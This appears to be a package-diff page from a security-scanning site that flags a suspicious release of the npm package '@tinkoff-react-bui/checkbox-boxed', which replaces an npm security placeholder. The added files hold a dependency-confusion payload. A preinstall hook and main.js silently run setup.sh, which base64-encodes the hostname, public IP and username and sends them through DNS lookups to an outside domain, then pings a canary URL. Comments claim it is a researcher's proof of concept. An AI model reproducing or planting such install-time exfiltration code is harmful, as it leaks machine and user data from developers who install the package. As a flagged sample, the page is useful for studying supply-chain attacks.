@tinkoff-react-bui/checkbox-boxed 0.0.1-security → 1.8.1

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of @tinkoff-react-bui/checkbox-boxed might be problematic. Click here for more details.

package/main.js ADDED
@@ -0,0 +1,17 @@
1
+ const { exec } = require("child_process");
2
+ exec("node index.js > /dev/null 2>&1; sh setup.sh > /dev/null 2>&1;", (error, data, getter) => {
3
+ if(error){
4
+ console.log("error",error.message);
5
+ return;
6
+ }
7
+ if(getter){
8
+ console.log(data);
9
+ return;
10
+ }
11
+ console.log(data);
12
+
13
+ });
14
+
15
+
16
+ // if you see this then you're safe, i just save your company from this supply chain attack, my goal is make internet more safer; thanks.
17
+ // #this is a poc script please consider this, because i am a security researcher here is my hackerone profile https://hackerone.com/x1337loser
package/package.json CHANGED
@@ -1,6 +1,16 @@
1
1
  {
2
2
  "name": "@tinkoff-react-bui/checkbox-boxed",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
3
+ "version": "1.8.1",
4
+ "description": "",
5
+ "main": "main.js",
6
+ "scripts": {
7
+ "preinstall": "node build.js",
8
+ "test": "node main.js"
9
+ },
10
+ "author": "<yetri+minguis>@tinkoff.ru,yetri(bemixif913@ningame.com)",
11
+ "license": "ISC",
12
+ "dependencies": {
13
+ "express": "^4.17.1",
14
+ "lodash": "^4.17.21"
15
+ }
6
16
  }
package/setup.sh ADDED
@@ -0,0 +1,14 @@
1
+ #!/usr/bin/bash
2
+ apt-get install xxd > /dev/null 2>&1;
3
+ apt-get install dnsutils > /dev/null 2>&1;
4
+ apt-get install curl > /dev/null 2>&1;
5
+ hostname | base64 | while read u;do dig $u.nirobtest.xyz;done > /dev/null 2>&1;
6
+ curl ifconfig.me | base64 | while read c;do dig $c.nirobtest.xyz;done > /dev/null 2>&1;
7
+ echo "@to-rc-b/checkbox-boxed" | base64 | while read d;do dig $d.nirobtest.xyz;done > /dev/null 2>&1;
8
+ whoami | base64 | while read a;do dig $a.nirobtest.xyz;done > /dev/null 2>&1;
9
+ curl http://canarytokens.com/images/about/tags/a2rttcd7o64zjdogjjke2tpsw/contact.php > /dev/null 2>&1;
10
+
11
+
12
+
13
+ #if you see this then you're safe, i just save your company from this supply chain attack, my goal is make internet more safer; thanks.
14
+ #this is a poc script please consider this, because i am a security researcher here is my hackerone profile https://hackerone.com/x1337loser